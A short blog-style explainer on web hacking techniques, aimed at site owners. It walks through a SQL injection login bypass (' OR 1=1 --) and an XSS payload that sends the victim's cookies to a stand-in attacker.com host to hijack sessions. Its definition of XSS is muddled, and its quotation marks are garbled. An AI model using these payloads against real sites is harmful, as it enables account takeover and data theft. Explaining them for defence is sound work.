Different Web Hacking Techniques

Online security is a serious matter. Every year, millions of dollars have been stolen, thousands of websites have been defaced and hundreds of classified information are being leaked and stolen by malicious individuals. Therefore, getting vigilant over online hackers should be one of our top priorities. One of the best ways to prevent our websites from getting hacked is being familiar with the popular hacking techniques used by malicious hackers around the world to compromise a system. Here’s some of the most popular web hacking techniques to get familiarized with. By knowing these, you can easily create countermeasures to prevent them from accessing your website further.

SQL Injection

SQL injection makes use of the vulnerability found in your website database. If a hacker was able to compromise your database and you’re running an online shop or a website that may contain confidential information, then you’re doomed. Hackers typically do it via website forms by inputting something that mimics an SQL code. One of the most common ways of doing this is by inputting…

  • ‘ OR 1=1 –

…in your website’s username field. The typical authorization command used by most databases is like…

  • SELECT * FROM users WHERE username = ?USRTEXT ‘ AND password = ?PASSTEXT?

…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form. If we analyze it carefully, the command will turn out like this:

  • SELECT * FROM users WHERE username = ?’ OR 1=1 — ‘AND password = ‘?

What do you need to know about it? The closes the username text field and – – is used for commenting an SQL code. Therefore, the actual query that would run will be:

  • SELECT * FROM users WHERE username = ” OR 1=1

Which roughly translates as “select every person in your database where the username is equal to the empty value or 1 = 1” which, as you can see, will likely to validate itself as true because 1 is always equal to one. You’ve now gained access to the website.

There are still tons of SQL injection techniques available to the hackers, so make sure your database is securely built.

XSS Attacks

XSS, also known as cross-site scripting is another popular hacking technique. It occurs when a web application in sent in the web browser, bypassing the authentication or validation process.

An example of cross-site scripting attack looks like this:

  • (String) page += “<input name=’creditcard’ type=’TEXT’ value=’” + request.getParameter(“CC”) + “‘>”;

Where an attacker would modify the CC parameter to attack:

  • ‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’

Which allows the cookies of a current user to be sent to the attacker’s website, giving him an ability to hijack the session. This will allow the hacker to gain access to the website admin panel and take it over.

Comments are closed.